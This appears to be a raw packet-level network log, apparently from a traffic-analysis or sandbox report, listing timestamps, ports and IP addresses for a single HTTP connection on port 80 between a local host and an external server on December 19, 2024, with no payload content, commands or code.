Dec 19, 2024 08:47:25.610938072 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.611361027 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.611433983 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.611759901 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.612010002 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.612566948 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.612747908 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.612838984 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.612845898 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.612941027 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.613516092 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.613672018 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.613903999 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.614321947 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.615107059 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.617289066 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.669106960 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.752576113 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.752826929 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.753110886 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.753118992 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.753266096 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.753566980 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.753945112 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.753952980 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.754025936 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.754491091 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.754576921 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.762264013 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.762665987 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.762682915 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.762782097 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.762993097 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.763371944 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.763530016 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.763582945 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.764318943 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.764456034 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.764832020 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.764919996 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.765172005 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.765527964 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.765883923 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.765980959 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.766045094 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.766293049 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.766581059 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.767087936 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.767488003 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.767497063 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.767592907 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.768552065 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.769054890 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.769063950 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.769146919 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.769758940 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.770025969 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.770077944 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.777540922 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.777713060 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.777765989 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.777775049 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.777791023 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.777877092 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.777924061 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.777931929 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.777991056 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.778628111 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.778637886 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.778687954 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.781950951 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.782021999 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.782140970 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.782655001 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.782664061 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.782854080 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.782991886 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.783000946 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.783034086 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.783123016 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.783123016 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.783206940 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.783705950 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.783715010 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.783724070 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.783731937 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.783740997 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.783936024 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.783936024 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.784235954 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.784456968 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.784467936 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.784670115 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.785166025 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.785290003 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.785804987 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.786036015 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.786045074 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.786267042 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.786775112 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.786783934 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.786830902 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.790008068 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.790026903 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.790452003 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.790802956 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.790813923 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.790829897 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.791002989 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.791002989 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.791614056 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.791625023 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.791691065 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.792289019 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.792309999 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.792437077 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.793190002 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.794619083 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.794646025 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.794920921 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.795439959 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.795449972 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.795464993 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.795525074 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.795525074 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.796173096 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.796194077 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.796670914 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.800379038 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.800407887 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.800415993 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.800424099 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.800432920 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.800441027 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.800465107 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.800465107 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.800570965 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.800582886 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.803445101 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.803584099 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.803962946 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.803973913 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.804162025 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.804616928 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.804626942 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.804708958 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.805557013 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.805567026 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.805844069 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.806232929 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.806248903 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.806265116 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.806315899 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.807079077 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.807090998 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.807296038 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.807853937 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.807863951 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.808043957 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.808538914 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.808548927 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.809348106 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.809534073 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.809542894 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.810174942 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.810184002 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.810199976 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.810265064 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.810265064 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.810266018 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.810978889 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.810996056 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.811336994 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.811739922 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.811748981 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.811764002 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.813389063 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.944818020 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.945261002 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.945267916 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.945385933 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.945713043 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.946079016 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.946085930 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.946289062 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.946808100 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.953211069 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.953385115 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.953635931 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.953644037 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.953746080 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.954046965 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.954406023 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.954456091 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.955179930 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.955193043 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.955339909 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.955627918 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.955993891 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.956000090 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.956078053 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.956804037 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.956980944 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.957056999 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.957540989 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.957554102 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.958245039 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.958314896 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.958519936 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.959110022 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.959336042 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.959336042 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.959897041 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.959908962 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.960087061 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.960233927 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.968312025 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.968539000 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.968612909 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.968841076 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.969177961 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.969383955 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.969551086 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.969558001 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.969681025 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.970355988 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.970362902 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.970724106 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.971002102 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.971333027 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.971333027 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.971770048 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.971826077 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.972019911 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.972589970 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.972852945 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.973381042 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.973412037 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.973418951 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.973678112 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.974201918 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.974210024 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.974278927 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.974962950 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.975220919 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.975286007 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.975759983 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.975861073 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.976203918 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.976577044 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.976584911 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.976646900 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.977369070 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.977427006 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.977570057 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.978143930 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.978257895 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.978445053 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.978935957 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.979119062 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.979290962 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.980120897 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.980129004 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.980371952 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.980829000 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.980837107 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.980889082 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.981523991 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.981529951 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.981627941 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.982193947 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.982944012 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.982950926 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.983109951 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.983261108 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.983927011 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.983933926 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.984103918 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.985177040 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.985184908 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.985331059 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.985604048 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.985615015 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.985676050 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.986206055 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.986515999 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.986558914 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.986932993 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.986939907 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.987042904 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.987591028 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.987976074 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.987989902 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.988404036 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.988785982 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.989228964 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.989367008 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.989697933 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.989778996 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.990011930 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.990149021 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.990371943 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.990798950 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.991070986 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.991219997 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.991575956 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.991802931 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.992036104 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.992367029 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.992882967 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.993081093 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.993185043 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.993191957 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.993351936 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.993961096 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.994178057 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.994290113 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.994781017 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.994949102 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.995347977 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.995620012 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.995702028 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.995821953 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.996346951 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.996548891 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.997153044 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.997160912 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.997427940 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.997545958 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.997910976 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.998208046 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.998305082 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.998766899 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.998779058 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.999121904 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.137293100 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.137387037 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.137463093 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.137752056 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.137768030 CET	80	49707	194.87.47.113	192.168.2.7
